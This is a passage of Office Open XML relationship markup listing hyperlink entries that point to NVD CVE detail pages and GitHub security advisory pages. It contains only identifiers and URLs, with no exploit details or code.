Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85584" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85585" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85604" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85626" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85699" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85786" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86173" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86177" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86193" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86195" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86196" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86727" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86732" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86738" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2rrw-hpqm-36pv" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-6r2r-ww24-7h52" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-7r39-6q8m-qw68" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-j95f-988m-3j2f" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-m4f3-g4cq-hqrx" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-wv46-xpj8-pw53" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-35585" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34223" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56703" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61517" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64199" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70626" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71504" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75121" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75122" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75123" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75990" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75991" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76190" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76199" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77109" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77774" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78675" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79721" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80097" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81525" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82304" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82684" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82712" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84194" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84203" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85388" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86167" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86185" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86509" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86510" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86712" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86722" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-4vpg-pfj8-m33q" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-crmc-f4m7-33fj" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16233" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16234" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45221" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4644" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58113" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61639" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61640" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64195" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64196" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64197" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64198" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64200" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67397" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74860" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75486" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75993" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80114" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80116" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80119" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81302" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85012" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85384" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85439" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85656" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86095" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75999" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76228" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76229" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76230" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76231" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76232" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76233" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76838" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77827" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85613" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86819" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-3vrx-526r-64rm" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19203" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52769" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52771" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66357" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69646" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73276" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73812" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76225" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81821" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81822" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82750" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82751" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85048" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85538" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52767" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54600" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55951" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61638" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62385" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66835" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72958" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72961" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72962" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73270" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75538" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75594" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76191" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76202" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77097" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77348" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77634" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77641" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77968" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79676" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80206" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81356" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81357" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81378" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81379" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82262" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82263" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82728" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83939" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86600" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-qp76-pq9f-gr9m" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19219" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47297" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54330" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55007" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61641" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61699" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69325" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69380" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69524" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69530" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69546" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69680" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69732" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69782" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69786" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69827" TargetMode="External" Id="rId668" /><Relationship 